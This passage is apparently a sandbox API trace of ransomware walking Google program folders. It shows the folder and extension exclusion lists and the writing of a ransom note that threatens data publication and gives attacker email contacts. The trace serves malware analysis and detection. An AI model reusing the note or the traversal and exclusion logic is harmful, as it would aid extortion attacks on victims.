lpSrch="Windows") returned 0x0 [0161.451] StrStrIW (lpFirst="ado", lpSrch="Trend Micro") returned 0x0 [0161.451] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebf48 [0161.451] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebe78 [0161.451] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebf48 | out: hHeap=0xea0000) returned 1 [0161.451] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecd10 [0161.451] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebf48 [0161.452] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebe78 | out: hHeap=0xea0000) returned 1 [0161.452] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x886e43c6, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0x886e43c6, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0x89202410, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x5e00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DirectDB.dll", cAlternateFileName="")) returned 1 [0161.452] lstrcmpW (lpString1="DirectDB.dll", lpString2=".") returned 1 [0161.452] lstrcmpW (lpString1="DirectDB.dll", lpString2="..") returned 1 [0161.452] StrStrIW (lpFirst="DirectDB.dll", lpSrch=".UAKXC") returned 0x0 [0161.452] StrStrIW (lpFirst="DirectDB.dll", lpSrch=".exe") returned 0x0 [0161.452] StrStrIW (lpFirst="DirectDB.dll", lpSrch=".dll") returned=".dll" [0161.452] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22a11cd0, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0161.452] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0161.452] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0161.452] StrStrIW (lpFirst="en-US", lpSrch="tmp") returned 0x0 [0161.452] StrStrIW (lpFirst="en-US", lpSrch="winnt") returned 0x0 [0161.452] StrStrIW (lpFirst="en-US", lpSrch="temp") returned 0x0 [0161.452] StrStrIW (lpFirst="en-US", lpSrch="thumb") returned 0x0 [0161.452] StrStrIW (lpFirst="en-US", lpSrch="$Recycle.Bin") returned 0x0 [0161.452] StrStrIW (lpFirst="en-US", lpSrch="$RECYCLE.BIN") returned 0x0 [0161.452] StrStrIW (lpFirst="en-US", lpSrch="System Volume Information") returned 0x0 [0161.452] StrStrIW (lpFirst="en-US", lpSrch="Boot") returned 0x0 [0161.452] StrStrIW (lpFirst="en-US", lpSrch="Windows") returned 0x0 [0161.452] StrStrIW (lpFirst="en-US", lpSrch="Trend Micro") returned 0x0 [0161.452] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebe78 [0161.452] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebee0 [0161.452] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf350d8 [0161.452] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebee0 | out: hHeap=0xea0000) returned 1 [0161.452] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebe78 | out: hHeap=0xea0000) returned 1 [0161.453] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeece00 [0161.453] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x7796778 [0161.453] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf350d8 | out: hHeap=0xea0000) returned 1 [0161.453] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8f7490, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1ea40f84, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="msadc", cAlternateFileName="")) returned 1 [0161.453] lstrcmpW (lpString1="msadc", lpString2=".") returned 1 [0161.453] lstrcmpW (lpString1="msadc", lpString2="..") returned 1 [0161.453] StrStrIW (lpFirst="msadc", lpSrch="tmp") returned 0x0 [0161.453] StrStrIW (lpFirst="msadc", lpSrch="winnt") returned 0x0 [0161.453] StrStrIW (lpFirst="msadc", lpSrch="temp") returned 0x0 [0161.453] StrStrIW (lpFirst="msadc", lpSrch="thumb") returned 0x0 [0161.453] StrStrIW (lpFirst="msadc", lpSrch="$Recycle.Bin") returned 0x0 [0161.453] StrStrIW (lpFirst="msadc", lpSrch="$RECYCLE.BIN") returned 0x0 [0161.453] StrStrIW (lpFirst="msadc", lpSrch="System Volume Information") returned 0x0 [0161.453] StrStrIW (lpFirst="msadc", lpSrch="Boot") returned 0x0 [0161.453] StrStrIW (lpFirst="msadc", lpSrch="Windows") returned 0x0 [0161.453] StrStrIW (lpFirst="msadc", lpSrch="Trend Micro") returned 0x0 [0161.453] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebe78 [0161.453] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebee0 [0161.453] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf350d8 [0161.453] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebee0 | out: hHeap=0xea0000) returned 1 [0161.453] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebe78 | out: hHeap=0xea0000) returned 1 [0161.453] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x77955c0 [0161.453] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x77968e0 [0161.453] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf350d8 | out: hHeap=0xea0000) returned 1 [0161.453] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8f7490, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5f34af90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5f34af90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Ole DB", cAlternateFileName="OLEDB~1")) returned 1 [0161.453] lstrcmpW (lpString1="Ole DB", lpString2=".") returned 1 [0161.453] lstrcmpW (lpString1="Ole DB", lpString2="..") returned 1 [0161.453] StrStrIW (lpFirst="Ole DB", lpSrch="tmp") returned 0x0 [0161.454] StrStrIW (lpFirst="Ole DB", lpSrch="winnt") returned 0x0 [0161.454] StrStrIW (lpFirst="Ole DB", lpSrch="temp") returned 0x0 [0161.454] StrStrIW (lpFirst="Ole DB", lpSrch="thumb") returned 0x0 [0161.454] StrStrIW (lpFirst="Ole DB", lpSrch="$Recycle.Bin") returned 0x0 [0161.454] StrStrIW (lpFirst="Ole DB", lpSrch="$RECYCLE.BIN") returned 0x0 [0161.454] StrStrIW (lpFirst="Ole DB", lpSrch="System Volume Information") returned 0x0 [0161.454] StrStrIW (lpFirst="Ole DB", lpSrch="Boot") returned 0x0 [0161.454] StrStrIW (lpFirst="Ole DB", lpSrch="Windows") returned 0x0 [0161.454] StrStrIW (lpFirst="Ole DB", lpSrch="Trend Micro") returned 0x0 [0161.454] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebe78 [0161.454] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebee0 [0161.454] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf350d8 [0161.454] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebee0 | out: hHeap=0xea0000) returned 1 [0161.454] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebe78 | out: hHeap=0xea0000) returned 1 [0161.454] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x77955e8 [0161.454] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x7796868 [0161.454] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf350d8 | out: hHeap=0xea0000) returned 1 [0161.454] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x650ac030, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x650ac030, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x650ac030, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0161.454] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0161.454] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0161.454] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0161.454] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0161.454] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0161.454] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0161.454] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0161.455] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0161.455] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0161.455] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c2406d7, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0x8c2406d7, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0xb04ef6b0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xad000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wab32.dll", cAlternateFileName="")) returned 1 [0161.455] lstrcmpW (lpString1="wab32.dll", lpString2=".") returned 1 [0161.455] lstrcmpW (lpString1="wab32.dll", lpString2="..") returned 1 [0161.455] StrStrIW (lpFirst="wab32.dll", lpSrch=".UAKXC") returned 0x0 [0161.455] StrStrIW (lpFirst="wab32.dll", lpSrch=".exe") returned 0x0 [0161.455] StrStrIW (lpFirst="wab32.dll", lpSrch=".dll") returned=".dll" [0161.455] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d4d923a, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0x8d4d923a, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0xf37f6470, ftLastWriteTime.dwHighDateTime=0x1ca041f, nFileSizeHigh=0x0, nFileSizeLow=0x10c400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wab32res.dll", cAlternateFileName="")) returned 1 [0161.455] lstrcmpW (lpString1="wab32res.dll", lpString2=".") returned 1 [0161.455] lstrcmpW (lpString1="wab32res.dll", lpString2="..") returned 1 [0161.455] StrStrIW (lpFirst="wab32res.dll", lpSrch=".UAKXC") returned 0x0 [0161.455] StrStrIW (lpFirst="wab32res.dll", lpSrch=".exe") returned 0x0 [0161.455] StrStrIW (lpFirst="wab32res.dll", lpSrch=".dll") returned=".dll" [0161.455] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d4d923a, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0x8d4d923a, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0xf37f6470, ftLastWriteTime.dwHighDateTime=0x1ca041f, nFileSizeHigh=0x0, nFileSizeLow=0x10c400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wab32res.dll", cAlternateFileName="")) returned 0 [0161.455] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec018 | out: hHeap=0xea0000) returned 1 [0161.455] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecce8 | out: hHeap=0xea0000) returned 1 [0161.455] FindClose (in: hFindFile=0xecfb60 | out: hFindFile=0xecfb60) returned 1 [0161.455] Sleep (dwMilliseconds=0x32) [0161.507] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebfb0 | out: hHeap=0xea0000) returned 1 [0161.507] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec4f8 | out: hHeap=0xea0000) returned 1 [0161.507] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec3658 [0161.507] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2bb0 [0161.507] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec31e0 [0161.507] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2bb0 | out: hHeap=0xea0000) returned 1 [0161.507] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2bb0 [0161.507] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecce8 [0161.507] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2dc0 [0161.507] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec3080 [0161.507] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x76) returned 0xeb05d0 [0161.507] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec3080 | out: hHeap=0xea0000) returned 1 [0161.507] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2dc0 | out: hHeap=0xea0000) returned 1 [0161.507] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecce8 | out: hHeap=0xea0000) returned 1 [0161.507] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\R3ADM3.txt" (normalized: "c:\\program files (x86)\\google\\chrome\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6dc [0161.508] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0161.508] WriteFile (in: hFile=0x6dc, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0161.509] CloseHandle (hObject=0x6dc) returned 1 [0161.509] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeb05d0 | out: hHeap=0xea0000) returned 1 [0161.509] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2bb0 | out: hHeap=0xea0000) returned 1 [0161.510] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7aa9d740, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x651445b0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x651445b0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfb60 [0161.510] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0161.510] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7aa9d740, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x651445b0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x651445b0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.510] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0161.510] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0161.510] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ded59e0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7ded59e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7ded59e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application", cAlternateFileName="APPLIC~1")) returned 1 [0161.510] lstrcmpW (lpString1="Application", lpString2=".") returned 1 [0161.510] lstrcmpW (lpString1="Application", lpString2="..") returned 1 [0161.510] StrStrIW (lpFirst="Application", lpSrch="tmp") returned 0x0 [0161.510] StrStrIW (lpFirst="Application", lpSrch="winnt") returned 0x0 [0161.510] StrStrIW (lpFirst="Application", lpSrch="temp") returned 0x0 [0161.510] StrStrIW (lpFirst="Application", lpSrch="thumb") returned 0x0 [0161.510] StrStrIW (lpFirst="Application", lpSrch="$Recycle.Bin") returned 0x0 [0161.510] StrStrIW (lpFirst="Application", lpSrch="$RECYCLE.BIN") returned 0x0 [0161.510] StrStrIW (lpFirst="Application", lpSrch="System Volume Information") returned 0x0 [0161.510] StrStrIW (lpFirst="Application", lpSrch="Boot") returned 0x0 [0161.510] StrStrIW (lpFirst="Application", lpSrch="Windows") returned 0x0 [0161.510] StrStrIW (lpFirst="Application", lpSrch="Trend Micro") returned 0x0 [0161.510] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecce8 [0161.510] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2bb0 [0161.510] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2dc0 [0161.510] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x76) returned 0xeb05d0 [0161.510] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2dc0 | out: hHeap=0xea0000) returned 1 [0161.510] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2bb0 | out: hHeap=0xea0000) returned 1 [0161.510] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecce8 | out: hHeap=0xea0000) returned 1 [0161.510] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecce8 [0161.510] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x7796958 [0161.511] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeb05d0 | out: hHeap=0xea0000) returned 1 [0161.511] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x651445b0, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x651445b0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x651445b0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0161.511] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0161.511] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0161.511] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0161.511] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0161.511] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0161.511] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0161.511] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0161.511] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0161.511] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0161.511] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x651445b0, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x651445b0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x651445b0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 0 [0161.511] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec3028 | out: hHeap=0xea0000) returned 1 [0161.511] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6b28 | out: hHeap=0xea0000) returned 1 [0161.511] FindClose (in: hFindFile=0xecfb60 | out: hFindFile=0xecfb60) returned 1 [0161.511] Sleep (dwMilliseconds=0x32) [0161.569] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec31e0 | out: hHeap=0xea0000) returned 1 [0161.570] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec3658 | out: hHeap=0xea0000) returned 1 [0161.570] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec4f8 [0161.570] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebfb0 [0161.570] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec018 [0161.570] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebfb0 | out: hHeap=0xea0000) returned 1 [0161.570] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebfb0 [0161.570] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6b28 [0161.570] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebe78 [0161.570] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebee0 [0161.570] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf350d8 [0161.570] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebee0 | out: hHeap=0xea0000) returned 1 [0161.570] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebe78 | out: hHeap=0xea0000) returned 1 [0161.570] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6b28 | out: hHeap=0xea0000) returned 1 [0161.570] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\CrashReports\\R3ADM3.txt" (normalized: "c:\\program files (x86)\\google\\crashreports\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6dc [0161.572] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0161.572] WriteFile (in: hFile=0x6dc, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0161.573] CloseHandle (hObject=0x6dc) returned 1 [0161.573] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf350d8 | out: hHeap=0xea0000) returned 1 [0161.573] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebfb0 | out: hHeap=0xea0000) returned 1 [0161.573] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Google\\CrashReports\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c82ea80, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x651dcb30, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x651dcb30, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfb60 [0161.573] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0161.573] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c82ea80, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x651dcb30, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x651dcb30, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.573] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0161.573] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0161.573] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x651dcb30, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x651dcb30, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x651dcb30, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0161.573] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0161.573] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0161.574] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0161.574] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0161.574] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0161.574] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0161.574] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0161.574] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0161.574] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0161.574] FindNextFileW (in: 